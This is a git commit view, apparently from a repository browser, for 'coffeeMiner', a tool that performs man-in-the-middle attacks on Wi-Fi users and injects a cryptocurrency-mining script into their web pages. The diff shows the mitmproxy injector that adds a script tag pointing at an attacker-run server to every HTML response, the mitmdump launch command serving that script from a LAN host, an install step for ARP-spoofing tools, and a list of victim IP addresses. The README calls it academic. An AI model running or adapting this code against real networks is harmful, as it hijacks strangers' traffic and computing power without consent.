Browse Source

readme updated, removed comments

master
arnaucode 2 years ago
parent
commit
7a9270e7d8
9 changed files with 15 additions and 22 deletions
  1. +9
    -2
      README.md
  2. BIN
      coffeeMiner-demo-cutted.gif
  3. BIN
      coffeeMiner-logo-small.png
  4. BIN
      coffeeMiner-network-attack.png
  5. +1
    -1
      coffeeMiner.py
  6. +0
    -15
      injector.py
  7. +0
    -2
      install.sh
  8. BIN
      network.png
  9. +5
    -2
      victims.txt

+ 9
- 2
README.md View File

@@ -4,6 +4,9 @@ Collaborative (mitm) cryptocurrency mining pool in wifi networks

**Warning: this project is for academic/research purposes only.**

A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

![coffeeMiner](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-logo-small.png "coffeeMiner")

## Concept
- Performs a MITM attack to all selected victims
@@ -22,12 +25,16 @@ bash install.sh
```py
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
```
- run.py
- execute coffeeMiner.py
```
python3 coffeeMiner.py ipgateway
```

![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/network.png "network")
![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-network-attack.png "network")


A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md



![demo](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-demo-cutted.gif "demo")

BIN
coffeeMiner-demo-cutted.gif View File

Before After
Width: 600  |  Height: 497  |  Size: 2.5MB

BIN
coffeeMiner-logo-small.png View File

Before After
Width: 179  |  Height: 196  |  Size: 20KB

BIN
coffeeMiner-network-attack.png View File

Before After
Width: 539  |  Height: 438  |  Size: 75KB

+ 1
- 1
coffeeMiner.py View File

@@ -25,7 +25,7 @@ for victim in victims:
os.system("xterm -hold -e 'python3 httpServer.py' &")

# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")


'''


+ 0
- 15
injector.py View File

@@ -5,29 +5,16 @@ from mitmproxy import ctx, http
import argparse

class Injector:
'''
def load(self, loader):
loader.add_option(
"scr_url", str, "", "script_url to inject"
)
'''
def __init__(self, path):
self.path = path

def response(self, flow: http.HTTPFlow) -> None:
#print("hola hola hola")
#print(self.path)

if self.path:
html = BeautifulSoup(flow.response.content, "html.parser")
print(self.path)
print(flow.response.headers["content-type"])
if flow.response.headers["content-type"] == 'text/html':
print("uuuuuu")
print(flow.response.headers["content-type"])
print("asdf asdf asdf asdf asdf")
print("-----")
print("mmmmm")
script = html.new_tag(
"script",
src=self.path,
@@ -41,5 +28,3 @@ def start():
parser.add_argument("path", type=str)
args = parser.parse_args()
return Injector(args.path)

#addons = [Injector()]

+ 0
- 2
install.sh View File

@@ -1,5 +1,3 @@
#TODO put --yes to all installation commands

# install arpspoof (dsniff)
apt-get -y install dsniff



BIN
network.png View File

Before After
Width: 501  |  Height: 501  |  Size: 76KB

+ 5
- 2
victims.txt View File

@@ -1,2 +1,5 @@
192.168.1.30
192.168.1.31
192.168.1.41
192.168.1.35
192.168.1.45
192.168.1.48
192.168.1.38

Loading…
Cancel
Save